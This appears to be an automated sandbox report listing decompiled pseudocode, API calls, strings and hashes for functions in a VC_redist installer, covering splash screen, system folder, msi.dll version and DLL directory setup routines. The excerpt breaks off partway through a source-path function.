                                                                          0x00015f14
                                                                          0x00015f1a
                                                                          0x00015f21
                                                                          0x00015f28
                                                                          0x00015f31
                                                                          0x00015f37
                                                                          0x00015f38
                                                                          0x00015f39
                                                                          0x00015f3a
                                                                          0x00015f3f
                                                                          0x00015f53
                                                                          0x00015f59
                                                                          0x00015f5f
                                                                          0x00015f63
                                                                          0x00015f90
                                                                          0x00015f9a
                                                                          0x00015f9e
                                                                          0x00015fc0
                                                                          0x00015fed
                                                                          0x00015ff9
                                                                          0x00015ffd
                                                                          0x00015fff
                                                                          0x00000000
                                                                          0x00015fff
                                                                          0x00015fc2
                                                                          0x00015fcf
                                                                          0x00015fd4
                                                                          0x00000000
                                                                          0x00015fd6
                                                                          0x00015fe1
                                                                          0x00015fe6
                                                                          0x00000000
                                                                          0x00015fe6
                                                                          0x00015fd4
                                                                          0x00015fa0
                                                                          0x00015fa0
                                                                          0x00000000
                                                                          0x00015fa0
                                                                          0x00015f65
                                                                          0x00015f72
                                                                          0x00015f77
                                                                          0x00000000
                                                                          0x00015f79
                                                                          0x00015f84
                                                                          0x00015f89
                                                                          0x00016004
                                                                          0x00016004
                                                                          0x00016005
                                                                          0x0001600b
                                                                          0x00015f77
                                                                          0x00016010
                                                                          0x00016015
                                                                          0x00016015
                                                                          0x0001602c

                                                                          APIs
                                                                          • GetSystemTime.KERNEL32(?), ref: 00015F3F
                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 00015F53
                                                                          • GetLastError.KERNEL32 ref: 00015F65
                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 00015FB8
                                                                          • GetLastError.KERNEL32 ref: 00015FC2
                                                                          Strings
                                                                          • Failed to get the required buffer length for the Date., xrefs: 00015F89
                                                                          • Failed to allocate the buffer for the Date., xrefs: 00015FA0
                                                                          • Failed to get the Date., xrefs: 00015FE6
                                                                          • variable.cpp, xrefs: 00015F7F, 00015FDC
                                                                          • Failed to set variant value., xrefs: 00015FFF
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: DateErrorFormatLast$SystemTime
                                                                          • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
                                                                          • API String ID: 2700948981-3682088697
                                                                          • Opcode ID: 854611996e27806ee45524ac01d09bb99f5daa53a9ce9a77f850d82338178be8
                                                                          • Instruction ID: ac42b9ea2d061f42f5f0e26494f8b5d0a2c4f3797016c46394270d7181750abe
                                                                          • Opcode Fuzzy Hash: 854611996e27806ee45524ac01d09bb99f5daa53a9ce9a77f850d82338178be8
                                                                          • Instruction Fuzzy Hash: 5A31FB32A40715BFEB21ABE9CC42FEF7AA8EB44711F01002AFF01FB190D6719D4486A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002E05E Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 103windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 59%
                                                                          			E0002E05E(struct HINSTANCE__* _a4, void** _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagMONITORINFO _v48;
				struct tagPOINT _v56;
				void* _v72;
				void* _v76;
				void _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t33;
				int _t36;
				void* _t38;
				struct HMONITOR__* _t44;
				signed short _t60;
				void** _t64;
				signed int _t65;
				void* _t67;
				struct HINSTANCE__* _t75;
				void* _t78;
				void* _t79;
				int _t80;
				signed int _t84;

				_t33 =  *0x7a008; // 0xfbf51acb
				_v8 = _t33 ^ _t84;
				_t75 = _a4;
				_t64 = _a8;
				_t65 = 6;
				_t80 = 0;
				_t36 = memset( &_v80, 0, _t65 << 2);
				_t67 = 0xa;
				_t78 =  &_v48;
				_v56.x = 0;
				memset(_t78, _t36, 0 << 2);
				_t79 = _t78 + _t67;
				_v56.y = 0;
				_t38 = LoadBitmapW(_t75, 1);
				 *_t64 = _t38;
				if(_t38 != 0) {
					GetObjectW(_t38, 0x18,  &_v80);
					_t64[1] = 0x80000000;
					_t64[2] = 0x80000000;
					_t64[3] = _v76;
					_t64[4] = _v72;
					_t44 = GetCursorPos( &_v56);
					if(_t44 != 0) {
						__imp__MonitorFromPoint(_v56.x, _v56.y, 2);
						if(_t44 != 0) {
							_v48.cbSize = 0x28;
							if(GetMonitorInfoW(_t44,  &_v48) != 0) {
								asm("cdq");
								_t64[1] = (_v20 - _t64[3] - _v48.rcWork - _t75 >> 1) + _v48.rcWork;
								asm("cdq");
								_t64[2] = (_v16 - _v24 - _t64[4] - _t75 >> 1) + _v24;
							}
						}
					}
				} else {
					_t60 = GetLastError();
					_t83 =  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
					_t80 =  >=  ? 0x80004005 :  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "splashscreen.cpp", 0xe8, _t80);
					_push("Failed to load splash screen bitmap.");
					_push(_t80);
					E0005012F();
				}
				return E0003DE36(_t64, _v8 ^ _t84, _t75, _t79, _t80);
			}





























                                                                          0x0002e064
                                                                          0x0002e06b
                                                                          0x0002e06e
                                                                          0x0002e074
                                                                          0x0002e07b
                                                                          0x0002e081
                                                                          0x0002e083
                                                                          0x0002e085
                                                                          0x0002e088
                                                                          0x0002e08b
                                                                          0x0002e08e
                                                                          0x0002e08e
                                                                          0x0002e091
                                                                          0x0002e094
                                                                          0x0002e09a
                                                                          0x0002e09e
                                                                          0x0002e0e7
                                                                          0x0002e0f2
                                                                          0x0002e0f5
                                                                          0x0002e0fb
                                                                          0x0002e101
                                                                          0x0002e108
                                                                          0x0002e110
                                                                          0x0002e11a
                                                                          0x0002e122
                                                                          0x0002e127
                                                                          0x0002e138
                                                                          0x0002e143
                                                                          0x0002e14b
                                                                          0x0002e157
                                                                          0x0002e15f
                                                                          0x0002e15f
                                                                          0x0002e138
                                                                          0x0002e122
                                                                          0x0002e0a0
                                                                          0x0002e0a0
                                                                          0x0002e0b1
                                                                          0x0002e0bb
                                                                          0x0002e0c9
                                                                          0x0002e0ce
                                                                          0x0002e0d3
                                                                          0x0002e0d4
                                                                          0x0002e0da
                                                                          0x0002e174

                                                                          APIs
                                                                          • LoadBitmapW.USER32(?,00000001), ref: 0002E094
                                                                          • GetLastError.KERNEL32 ref: 0002E0A0
                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0002E0E7
                                                                          • GetCursorPos.USER32(?), ref: 0002E108
                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 0002E11A
                                                                          • GetMonitorInfoW.USER32 ref: 0002E130
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
                                                                          • String ID: ($@Met$Failed to load splash screen bitmap.$splashscreen.cpp
                                                                          • API String ID: 2342928100-2066116584
                                                                          • Opcode ID: 3d5b30604a81ebe3b4ebcf70ab9a1c3fe52de86281709656c150dd63867c76b9
                                                                          • Instruction ID: f1f2498538c8613f7ada8a25440f62bab874749ab28dcb65d49152e720abf6d7
                                                                          • Opcode Fuzzy Hash: 3d5b30604a81ebe3b4ebcf70ab9a1c3fe52de86281709656c150dd63867c76b9
                                                                          • Instruction Fuzzy Hash: EE314F71A002159FDB50DFB8D985A9EBBF9EB08711F048129F904EB281DB74E901CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000164B6 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 93COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 43%
                                                                          			E000164B6(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v528;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				char* _t14;
				signed short _t15;
				signed short _t23;
				signed short _t27;
				void* _t30;
				void* _t36;
				signed short _t39;
				signed short _t42;
				signed int _t46;

				_t36 = __edx;
				_t30 = __ebx;
				_t10 =  *0x7a008; // 0xfbf51acb
				_v8 = _t10 ^ _t46;
				_t37 = _a8;
				E0003F670(_a8,  &_v528, 0, 0x208);
				_t14 =  &_v528;
				_push(0x104);
				_push(_t14);
				if(_a4 == 0) {
					_t15 = GetSystemDirectoryW();
					__eflags = _t15;
					if(_t15 != 0) {
						goto L6;
					} else {
						_t23 = GetLastError();
						__eflags = _t23;
						_t42 =  <=  ? _t23 : _t23 & 0x0000ffff | 0x80070000;
						__eflags = _t42;
						_t39 =  >=  ? 0x80004005 : _t42;
						E000137D3(0x80004005, "variable.cpp", 0x77e, _t39);
						_push("Failed to get 64-bit system folder.");
						goto L11;
					}
				} else {
					__imp__GetSystemWow64DirectoryW();
					if(_t14 != 0) {
						L6:
						__eflags = _v528;
						if(__eflags == 0) {
							L9:
							_t39 = E000302F4(_t37,  &_v528, 0);
							__eflags = _t39;
							if(_t39 < 0) {
								_push("Failed to set system folder variant value.");
								goto L11;
							}
						} else {
							_t39 = E0001338F(0, __eflags,  &_v528, 0x104);
							__eflags = _t39;
							if(_t39 >= 0) {
								goto L9;
							} else {
								_push("Failed to backslash terminate system folder.");
								goto L11;
							}
						}
					} else {
						_t27 =  !=  ? 0 : GetLastError();
						if(_t27 == 0) {
							goto L6;
						} else {
							_t45 =  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
							_t39 =  >=  ? 0x80004005 :  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
							E000137D3(0x80004005, "variable.cpp", 0x777, _t39);
							_push("Failed to get 32-bit system folder.");
							L11:
							_push(_t39);
							E0005012F();
						}
					}
				}
				return E0003DE36(_t30, _v8 ^ _t46, _t36, _t37, _t39);
			}


















                                                                          0x000164b6
                                                                          0x000164b6
                                                                          0x000164bf
                                                                          0x000164c6
                                                                          0x000164cb
                                                                          0x000164dc
                                                                          0x000164e4
                                                                          0x000164f3
                                                                          0x000164f4
                                                                          0x000164f5
                                                                          0x00016546
                                                                          0x0001654c
                                                                          0x0001654e
                                                                          0x00000000
                                                                          0x00016550
                                                                          0x00016550
                                                                          0x0001655f
                                                                          0x00016561
                                                                          0x00016569
                                                                          0x0001656b
                                                                          0x00016579
                                                                          0x0001657e
                                                                          0x00000000
                                                                          0x0001657e
                                                                          0x000164f7
                                                                          0x000164f7
                                                                          0x000164ff
                                                                          0x00016585
                                                                          0x00016585
                                                                          0x0001658d
                                                                          0x000165a9
                                                                          0x000165b8
                                                                          0x000165ba
                                                                          0x000165bc
                                                                          0x000165be
                                                                          0x00000000
                                                                          0x000165be
                                                                          0x0001658f
                                                                          0x0001659c
                                                                          0x0001659e
                                                                          0x000165a0
                                                                          0x00000000
                                                                          0x000165a2
                                                                          0x000165a2
                                                                          0x00000000
                                                                          0x000165a2
                                                                          0x000165a0
                                                                          0x00016505
                                                                          0x00016510
                                                                          0x00016515
                                                                          0x00000000
                                                                          0x00016517
                                                                          0x00016522
                                                                          0x0001652c
                                                                          0x0001653a
                                                                          0x0001653f
                                                                          0x000165c3
                                                                          0x000165c3
                                                                          0x000165c4
                                                                          0x000165ca
                                                                          0x00016515
                                                                          0x000164ff
                                                                          0x000165dc

                                                                          APIs
                                                                          • GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 000164F7
                                                                          • GetLastError.KERNEL32 ref: 00016505
                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00016546
                                                                          • GetLastError.KERNEL32 ref: 00016550
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryErrorLastSystem$Wow64
                                                                          • String ID: @Met$Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
                                                                          • API String ID: 2634638900-589889694
                                                                          • Opcode ID: 34bf61dd9944659e57c36b44d1b5a32e101a23114356c154a769cd8736d5439e
                                                                          • Instruction ID: 99018539a8e4801e752ae8280b7bb4905286898229c66ebb1b0d97294939b3f8
                                                                          • Opcode Fuzzy Hash: 34bf61dd9944659e57c36b44d1b5a32e101a23114356c154a769cd8736d5439e
                                                                          • Instruction Fuzzy Hash: 46212B71E4073566EB2067A59C05BEB36DC9F00751F100166FD08EB1C1EA25DE8885E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001671C Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 74libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 19%
                                                                          			E0001671C(void* __edx, intOrPtr _a8) {
				signed int _v8;
				signed short _v20;
				signed short _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				_Unknown_base(*)()* _t13;
				signed short _t22;
				intOrPtr _t25;
				void* _t32;
				char* _t33;
				void* _t34;
				signed int _t38;

				_t32 = __edx;
				_t9 =  *0x7a008; // 0xfbf51acb
				_v8 = _t9 ^ _t38;
				_t25 = _a8;
				_t33 =  &_v28;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t13 = GetProcAddress(GetModuleHandleW(L"msi"), "DllGetVersion");
				if(_t13 != 0) {
					_v28 = 0x14;
					_t34 =  *_t13( &_v28);
					if(_t34 >= 0) {
						asm("cdq");
						_t34 = E00030455(_t25, 0, (_v24 & 0x0000ffff) << 0x00000010 | _v20 & 0x0000ffff);
						if(_t34 < 0) {
							_push("Failed to set variant value.");
							goto L6;
						}
					} else {
						_push("Failed to get msi.dll version info.");
						goto L6;
					}
				} else {
					_t22 = GetLastError();
					_t37 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
					_t34 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "variable.cpp", 0x725, _t34);
					_push("Failed to find DllGetVersion entry point in msi.dll.");
					L6:
					_push(_t34);
					E0005012F();
				}
				return E0003DE36(_t25, _v8 ^ _t38, _t32, _t33, _t34);
			}



















                                                                          0x0001671c
                                                                          0x00016722
                                                                          0x00016729
                                                                          0x0001672d
                                                                          0x00016734
                                                                          0x00016737
                                                                          0x00016742
                                                                          0x00016743
                                                                          0x00016744
                                                                          0x00016745
                                                                          0x0001674d
                                                                          0x00016755
                                                                          0x0001678f
                                                                          0x00016799
                                                                          0x0001679d
                                                                          0x000167b3
                                                                          0x000167bd
                                                                          0x000167c1
                                                                          0x000167c3
                                                                          0x00000000
                                                                          0x000167c3
                                                                          0x0001679f
                                                                          0x0001679f
                                                                          0x00000000
                                                                          0x0001679f
                                                                          0x00016757
                                                                          0x00016757
                                                                          0x00016768
                                                                          0x00016772
                                                                          0x00016780
                                                                          0x00016785
                                                                          0x000167c8
                                                                          0x000167c8
                                                                          0x000167c9
                                                                          0x000167cf
                                                                          0x000167e2

                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 00016746
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0001674D
                                                                          • GetLastError.KERNEL32 ref: 00016757
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorHandleLastModuleProc
                                                                          • String ID: @Met$DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
                                                                          • API String ID: 4275029093-1478416031
                                                                          • Opcode ID: e76f3fd0e9209da1eaf89e6753c7348b005acce1a7e3ed5a15ebac7cf372ba19
                                                                          • Instruction ID: f754e504191a9a275d9c8868cae07efcfe4820661049bf0cdf8b13d317e6992f
                                                                          • Opcode Fuzzy Hash: e76f3fd0e9209da1eaf89e6753c7348b005acce1a7e3ed5a15ebac7cf372ba19
                                                                          • Instruction Fuzzy Hash: 66112971B04729AAE720ABB8DC46AFF76D8DB08711F00051AFE05FB1C1EA259C0882E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00011174 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 53libraryloadermemoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 58%
                                                                          			E00011174(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				long _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				intOrPtr _t21;
				void* _t22;
				signed int _t23;

				_t23 = 0;
				_v8 = 0;
				__imp__HeapSetInformation(0, 1, 0, 0, _t18, _t22, _t14, __ecx);
				_t15 = GetModuleHandleW(L"kernel32");
				_t9 = GetProcAddress(_t15, "SetDefaultDllDirectories");
				if(_t9 == 0) {
					L3:
					_t10 = GetProcAddress(_t15, "SetDllDirectoryW");
					if(_t10 == 0) {
						L5:
						_t11 = GetLastError();
					} else {
						_t11 =  *_t10(0x5b524);
						if(_t11 == 0) {
							goto L5;
						}
					}
					if(_a8 > _t23) {
						_t21 = _a4;
						do {
							_t11 = E000137D6( *((intOrPtr*)(_t21 + _t23 * 4)),  &_v8);
							_t23 = _t23 + 1;
						} while (_t23 < _a8);
					}
				} else {
					_t11 =  *_t9(0x800);
					if(_t11 == 0) {
						GetLastError();
						goto L3;
					}
				}
				return _t11;
			}













                                                                          0x0001117b
                                                                          0x00011182
                                                                          0x00011185
                                                                          0x00011196
                                                                          0x0001119e
                                                                          0x000111ac
                                                                          0x000111bb
                                                                          0x000111c1
                                                                          0x000111c9
                                                                          0x000111d6
                                                                          0x000111d6
                                                                          0x000111cb
                                                                          0x000111d0
                                                                          0x000111d4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000111d4
                                                                          0x000111db
                                                                          0x000111dd
                                                                          0x000111e0
                                                                          0x000111e7
                                                                          0x000111ec
                                                                          0x000111ed
                                                                          0x000111e0
                                                                          0x000111ae
                                                                          0x000111b3
                                                                          0x000111b7
                                                                          0x000111b9
                                                                          0x00000000
                                                                          0x000111b9
                                                                          0x000111b7
                                                                          0x000111f8

                                                                          APIs
                                                                          • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0001111A,cabinet.dll,00000009,?,?,00000000), ref: 00011185
                                                                          • GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,0001111A,cabinet.dll,00000009,?,?,00000000), ref: 00011190
                                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0001119E
                                                                          • GetLastError.KERNEL32(?,?,?,?,0001111A,cabinet.dll,00000009,?,?,00000000), ref: 000111B9
                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000111C1
                                                                          • GetLastError.KERNEL32(?,?,?,?,0001111A,cabinet.dll,00000009,?,?,00000000), ref: 000111D6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorLastProc$HandleHeapInformationModule
                                                                          • String ID: @Met$SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                          • API String ID: 3104334766-461836836
                                                                          • Opcode ID: 9e962d5f40bd3539296917bdf604a1e42b96b4a9a7910352e00cf6bea8a000f4
                                                                          • Instruction ID: f4b53d101c909a71aefbc5d34f99e85219ed1b3b6fa326fc9bc0170b41b651f6
                                                                          • Opcode Fuzzy Hash: 9e962d5f40bd3539296917bdf604a1e42b96b4a9a7910352e00cf6bea8a000f4
                                                                          • Instruction Fuzzy Hash: 4E017571600715BB9B256BE69C09DEFBBACFF407A27004011FF1596180DB74EA458BB1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002E31B Relevance: 16.6, APIs: 11, Instructions: 86windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0002E31B(void** _a4, int _a8, int _a12, long _a16) {
				void* _t16;
				void* _t19;
				long _t28;
				struct HDC__* _t32;
				void* _t35;
				void* _t36;
				void* _t38;
				void* _t39;
				struct HWND__* _t41;
				void** _t43;
				long _t45;

				_t41 = _a4;
				_t43 = GetWindowLongW(_t41, 0xffffffeb);
				_t16 = 2;
				_a4 = _t43;
				_t35 = _a8 - _t16;
				if(_t35 == 0) {
					PostQuitMessage(0);
					return 0;
				}
				_t36 = _t35 - 0x12;
				if(_t36 == 0) {
					_t32 = CreateCompatibleDC(_a12);
					_t19 = SelectObject(_t32,  *_t43);
					StretchBlt(_a12, 0, 0, _a4[3], _a4[4], _t32, 0, 0,  *(_t20 + 0xc),  *(_t20 + 0x10), 0xcc0020);
					SelectObject(_t32, _t19);
					DeleteDC(_t32);
					return 1;
				}
				_t45 = _a16;
				_t38 = _t36 - 0x6d;
				if(_t38 == 0) {
					SetWindowLongW(_t41, 0xffffffeb,  *_t45);
					L8:
					return DefWindowProcW(_t41, _a8, _a12, _t45);
				}
				_t39 = _t38 - 1;
				if(_t39 == 0) {
					_t28 = DefWindowProcW(_t41, 0x82, _a12, _t45);
					SetWindowLongW(_t41, 0xffffffeb, 0);
					return _t28;
				}
				if(_t39 != _t16) {
					goto L8;
				}
				return _t16;
			}














                                                                          0x0002e320
                                                                          0x0002e32f
                                                                          0x0002e333
                                                                          0x0002e334
                                                                          0x0002e337
                                                                          0x0002e339
                                                                          0x0002e3e6
                                                                          0x00000000
                                                                          0x0002e3ec
                                                                          0x0002e33f
                                                                          0x0002e342
                                                                          0x0002e3a8
                                                                          0x0002e3ab
                                                                          0x0002e3cd
                                                                          0x0002e3d5
                                                                          0x0002e3d8
                                                                          0x00000000
                                                                          0x0002e3e1
                                                                          0x0002e344
                                                                          0x0002e347
                                                                          0x0002e34a
                                                                          0x0002e380
                                                                          0x0002e386
                                                                          0x00000000
                                                                          0x0002e38e
                                                                          0x0002e34c
                                                                          0x0002e34f
                                                                          0x0002e364
                                                                          0x0002e371
                                                                          0x00000000
                                                                          0x0002e377
                                                                          0x0002e353
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          APIs
                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0002E326
                                                                          • DefWindowProcW.USER32(?,00000082,?,?), ref: 0002E364
                                                                          • SetWindowLongW.USER32 ref: 0002E371
                                                                          • SetWindowLongW.USER32 ref: 0002E380
                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 0002E38E
                                                                          • CreateCompatibleDC.GDI32(?), ref: 0002E39A
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0002E3AB
                                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0002E3CD
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0002E3D5
                                                                          • DeleteDC.GDI32(00000000), ref: 0002E3D8
                                                                          • PostQuitMessage.USER32(00000000), ref: 0002E3E6
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
                                                                          • String ID:
                                                                          • API String ID: 409979828-0
                                                                          • Opcode ID: a1a018620aef1d7bd05d8aebde4d2ff8e7d9e89be0ed41df82d4dd7da376126b
                                                                          • Instruction ID: 352fd673edad90b37cc91602ce06066aca080d18497077702c79e328a37c19d9
                                                                          • Opcode Fuzzy Hash: a1a018620aef1d7bd05d8aebde4d2ff8e7d9e89be0ed41df82d4dd7da376126b
                                                                          • Instruction Fuzzy Hash: E421AC32140218BFEB249F68EC4CE7B3FA9EF49322B094518F616971B0D774AA109B60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00029F36 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 220COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 86%
                                                                          			E00029F36(void* __edx, void* __eflags, short* _a4, intOrPtr _a8, int* _a12, signed int _a16) {
				signed int _v8;
				short* _v20;
				int _v24;
				int _v28;
				void* _v32;
				char _v36;
				char _v40;
				char _v44;
				int* _v48;
				signed int _v52;
				char _v56;
				intOrPtr _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t70;
				signed int _t79;
				signed int _t81;
				signed int _t83;
				signed int _t85;
				void* _t99;
				int* _t102;
				int _t109;
				short* _t112;
				void* _t114;
				void* _t119;
				signed int _t127;
				signed int _t128;

				_t119 = __edx;
				_t70 =  *0x7a008; // 0xfbf51acb
				_v8 = _t70 ^ _t128;
				_t113 = 0;
				_v60 = _a8;
				_t112 = _a4;
				_v48 = _a12;
				_v52 = _a16;
				_v36 = 0;
				asm("stosd");
				_v32 = 0;
				_v28 = 0;
				asm("stosd");
				_v24 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				_t121 = 0;
				if(E00013568(_t112) == 0) {
					_t124 = _v60;
					_v56 = 0;
					_t79 = E0001738E(0, _v60, L"WixBundleLastUsedSource",  &_v24);
					__eflags = _t79 - 0x80070490;
					if(_t79 == 0x80070490) {
						_t79 = E0001738E(0, _t124, L"WixBundleOriginalSource",  &_v56);
						__eflags = _t79;
						if(_t79 >= 0) {
							_t79 = E00013446(0, _v56,  &_v24);
						}
					}
					__eflags =  *0x7aaa8 - _t121; // 0x0
					if(__eflags == 0) {
						L7:
						_t81 = E00013446(_t113,  *0x7aa90,  &_v36);
						__eflags = _t81;
						if(_t81 >= 0) {
							_t83 = E00012D79(_t113, _v36, _t112,  &_v32);
							__eflags = _t83;
							if(_t83 >= 0) {
								_v20 = _v32;
								_t121 = 1;
								__eflags = 1;
								goto L12;
							}
							goto L10;
						}
						_push("Failed to get current process directory.");
						goto L35;
					} else {
						__eflags = _t79;
